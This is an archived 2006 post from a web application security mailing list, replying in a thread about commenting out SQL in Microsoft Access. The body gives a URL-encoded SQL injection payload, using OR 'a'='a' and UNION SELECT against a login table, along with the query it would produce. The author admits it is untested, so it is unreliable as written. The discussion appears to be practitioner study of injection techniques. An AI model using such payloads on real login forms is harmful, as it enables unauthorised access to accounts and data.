WebApp Sec mailing list archives
Re: sql comment in access
From: John Bond <john.r.bond () gmail com>
Date: Mon, 23 Jan 2006 15:21:36 +0000
Can anyone suggest any other ways to comment out the rest of the statement?
I really havn't been thinking straight today. this is how you would do it, well one way at least ?user=q'%20or%20'a'='a'%20UNION%20SELECT%20*%20FROM%20login%20WHERE%20username='a&pass=a should produce SELECT * FROM login WHERE username='q' OR 'a'='a' UNION SELECT * FROM login WHERE username='a' and password='a'; i have magic quotes on and cant be bothered to test this but i am preety sure the above would work ------------------------------------------------------------------------- This List Sponsored by: Watchfire Watchfire's AppScan is the industry's first and leading web application security testing suite, and the only solution to provide comprehensive remediation tasks at every level of the application. See for yourself. Download AppScan 6.0 today. https://www.watchfire.com/securearea/appscansix.aspx?id=701300000003Ssh --------------------------------------------------------------------------
Current thread:
- sql comment in access Robin Wood (Jan 20)
- Re: sql comment in access John Bond (Jan 23)
- Message not available
- Re: sql comment in access John Bond (Jan 23)
- Message not available
- Re: sql comment in access John Bond (Jan 23)
- <Possible follow-ups>
- sql comment in access Robin Wood (Jan 21)
- Re: sql comment in access Chuck (Jan 22)
- RE: sql comment in access Mark Atherton (Jan 23)
- Re: sql comment in access Robin Wood (Jan 23)